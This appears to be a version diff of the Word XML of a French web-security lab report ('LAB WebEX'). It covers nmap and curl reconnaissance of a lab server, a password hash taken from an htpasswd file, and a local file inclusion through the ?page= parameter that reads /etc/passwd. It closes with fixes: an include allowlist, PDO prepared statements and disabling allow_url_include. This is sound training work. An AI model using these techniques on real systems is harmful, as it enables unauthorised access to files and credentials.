-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Statements</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>) :</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> C'est la solution ultime. En utilisant PDO, nous séparons la structure de la requête SQL des données. Le moteur SQL compile la requête d'abord, puis insère les données comme de simples paramètres. Même si l'utilisateur tape UNION SELECT, cela sera traité comme une simple chaîne de caractères et non comme une instruction.</w:t>
+        <w:t>Requêtes Préparées (Prepared Statements) :</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> C'est la solution ultime. En utilisant PDO, nous séparons la structure de la requête SQL des données. Le </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>moteur SQL compile la requête d'abord, puis insère les données comme de simples paramètres. Même si l'utilisateur tape UNION SELECT, cela sera traité comme une simple chaîne de caractères et non comme une instruction.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4588,222 +3957,42 @@
           <w:color w:val="FFFFFF" w:themeColor="background1"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-        <w:t>$</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t>$stmt = $pdo-&gt;prepare("SELECT username, email FROM users WHERE id = ?");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="FFFFFF" w:themeColor="background1"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-        <w:t>stmt</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="FFFFFF" w:themeColor="background1"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-        <w:t xml:space="preserve"> = $</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>$stmt-&gt;execute([$_GET['id']]);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="FFFFFF" w:themeColor="background1"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-        <w:t>pdo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>-&gt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>prepare</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t xml:space="preserve">("SELECT </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>username</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>email</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> FROM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>users</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> WHERE id = ?");</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>$</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>stmt</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>-&gt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>execute</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>([$_GET['id']]);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>$user = $</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>stmt</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>-&gt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>fetch</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="FFFFFF" w:themeColor="background1"/>
-          <w:highlight w:val="black"/>
-        </w:rPr>
-        <w:t>();</w:t>
+        <w:t>$user = $stmt-&gt;fetch();</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4876,35 +4065,8 @@
         <w:bCs/>
       </w:rPr>
       <w:tab/>
+      <w:t>Lab WebEX</w:t>
     </w:r>
-    <w:proofErr w:type="spellStart"/>
-    <w:r>
-      <w:rPr>
-        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        <w:b/>
-        <w:bCs/>
-      </w:rPr>
-      <w:t>Lab</w:t>
-    </w:r>
-    <w:proofErr w:type="spellEnd"/>
-    <w:r>
-      <w:rPr>
-        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        <w:b/>
-        <w:bCs/>
-      </w:rPr>
-      <w:t xml:space="preserve"> </w:t>
-    </w:r>
-    <w:proofErr w:type="spellStart"/>
-    <w:r>
-      <w:rPr>
-        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        <w:b/>
-        <w:bCs/>
-      </w:rPr>
-      <w:t>WebEX</w:t>
-    </w:r>
-    <w:proofErr w:type="spellEnd"/>
     <w:r>
       <w:rPr>
         <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>

--- a/LAB WebEX.docx
+++ b/LAB WebEX.docx
@@ -21,8 +21,20 @@
           <w:sz w:val="40"/>
           <w:szCs w:val="40"/>
         </w:rPr>
-        <w:t>LAB WebEX</w:t>
-      </w:r>
+        <w:t xml:space="preserve">LAB </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:t>WebEX</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -526,7 +538,21 @@
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
-        <w:t xml:space="preserve">Après avoir installer </w:t>
+        <w:t xml:space="preserve">Après avoir </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>installer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -534,11 +560,19 @@
         </w:rPr>
         <w:t xml:space="preserve">l’image </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t>Dark.ISO et récupérer l’adresse IP du serveur</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>Dark.ISO</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> et récupérer l’adresse IP du serveur</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -737,13 +771,59 @@
           <w:color w:val="92D050"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="92D050"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-        <w:t>nmap -sC -sV 192.168.10.22</w:t>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>sC</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>sV</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 192.168.10.22</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -819,13 +899,23 @@
           <w:color w:val="92D050"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="92D050"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-        <w:t xml:space="preserve">curl -I </w:t>
+        <w:t>curl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -I </w:t>
       </w:r>
       <w:hyperlink r:id="rId11" w:history="1">
         <w:r>
@@ -996,11 +1086,19 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-        </w:rPr>
-        <w:t xml:space="preserve">robots_and_hidden_files </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>robots_and_hidden_files</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1129,7 +1227,21 @@
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
-        <w:t xml:space="preserve">Dans le fichier htpasswd on récupère ce hash : </w:t>
+        <w:t xml:space="preserve">Dans le fichier </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>htpasswd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> on récupère ce hash : </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1491,7 +1603,35 @@
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
-        <w:t>Le fichier /etc/passwd est ciblé car il est lisible par tous les utilisateurs et confirme que l'on peut accéder au système des fichiers.</w:t>
+        <w:t>Le fichier /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>passwd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> est ciblé car il est lisible par tous les utilisateurs et confirme que l'on peut accéder au système des fichiers.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1668,7 +1808,35 @@
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
-        <w:t>La faille LFI permet à un attaquant de manipuler le paramètre ?page= pour lire des fichiers système comme /etc/passwd.</w:t>
+        <w:t>La faille LFI permet à un attaquant de manipuler le paramètre ?page= pour lire des fichiers système comme /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>passwd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1735,7 +1903,61 @@
           <w:color w:val="FFFFFF" w:themeColor="background1"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-        <w:t>$allowed_pages = ['home', 'survey', 'member', 'feedback', 'media'];</w:t>
+        <w:t>$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>allowed_pages</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = ['home', '</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>survey</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>', '</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>member</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>', 'feedback', 'media'];</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1790,7 +2012,43 @@
           <w:color w:val="FFFFFF" w:themeColor="background1"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-        <w:t>if (in_array($page, $allowed_pages)) {</w:t>
+        <w:t>if (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>in_array</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>($page, $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>allowed_pages</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>)) {</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1811,7 +2069,43 @@
           <w:color w:val="FFFFFF" w:themeColor="background1"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-        <w:t xml:space="preserve">    include "pages/" . $page . ".php";</w:t>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>include</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> "pages/" . $page . ".</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>";</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1832,7 +2126,25 @@
           <w:color w:val="FFFFFF" w:themeColor="background1"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-        <w:t>} else {</w:t>
+        <w:t xml:space="preserve">} </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>else</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> {</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1853,7 +2165,25 @@
           <w:color w:val="FFFFFF" w:themeColor="background1"/>
           <w:highlight w:val="black"/>
         </w:rPr>
-        <w:t xml:space="preserve">    include "pages/404.php";</w:t>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>include</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> "pages/404.php";</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1907,7 +2237,21 @@
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
         </w:rPr>
-        <w:t>Désactivation des fonctions dangereuses : Dans le fichier php.ini, il est conseillé de passer allow_url_include à Off pour empêcher les inclusions de fichiers distants (RFI).</w:t>
+        <w:t xml:space="preserve">Désactivation des fonctions dangereuses : Dans le fichier php.ini, il est conseillé de passer </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>allow_url_include</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> à Off pour empêcher les inclusions de fichiers distants (RFI).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1976,6 +2320,7 @@
         </w:rPr>
         <w:t>-</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
